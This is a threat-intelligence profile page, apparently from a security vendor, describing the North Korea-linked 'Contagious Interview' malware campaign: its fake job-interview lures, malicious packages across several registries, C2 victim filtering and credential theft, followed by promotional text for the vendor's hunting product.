Contagious Interview
Contagious Interview is a North Korea-linked malware campaign/cluster associated with staged payload delivery, malicious GitHub infrastructure, and software supply-chain abuse across multiple ecosystems. The provided content ties it to DPRK activity and references related malware names BeaverTail and OmniStealer. Reporting cited in the content describes the campaign as operating at scale with hundreds of malicious packages, fake LinkedIn profiles, rotating C2 servers, and malicious interview lures. It has been observed across npm and, in broader reporting, across five ecosystems including npm, PyPI, Go, Rust, and PHP/Packagist. The campaign has also been referenced in GitLab disruption reporting involving malware distribution and fraudulent IT worker operations.
Behaviorally, the content states that Contagious Interview has configured C2 endpoints to inspect IP geolocation, request headers, victim environment details, and runtime conditions before delivering payloads, indicating selective payload staging and victim validation. It has also requested victims disable Docker and other container environments to defeat container isolation and improve infection success. Additional referenced reporting indicates post-compromise tampering with MetaMask wallets. Splunk threat-context mapping in the content associates the campaign with ATT&CK technique T1567 (Exfiltration Over Web Service), indicating web-based exfiltration as relevant observed behavior.
The content further places Contagious Interview in the context of recent software supply-chain compromises, including malicious packages and compromises of legitimate packages, with emphasis on credential theft, CI/CD token theft, and propagation through trusted developer ecosystems. High-confidence indicators from the content are limited to campaign characteristics rather than concrete IOCs: malicious GitHub accounts and infrastructure, rotating C2 servers, fake LinkedIn personas, malicious packages across multiple package registries, C2-side geolocation and environment filtering, and victim instructions to disable Docker/container protections.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
IOCs tracked for this family
23 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
9 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A North Korea-linked cross-ecosystem campaign spanning npm, PyPI, Go, Rust, and Packagist that delivered staged RAT payloads through software package ecosystems.
Referenced as the named operation/campaign discussed in the post title; no technical malware functionality is described in the provided content.
Malware used in North Korea-linked campaigns targeting software developers, associated with credential theft and enabling remote control of devices.
Contagious Interview is referenced in the detection annotations as malware or campaign-related malware associated with exfiltration over web services.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.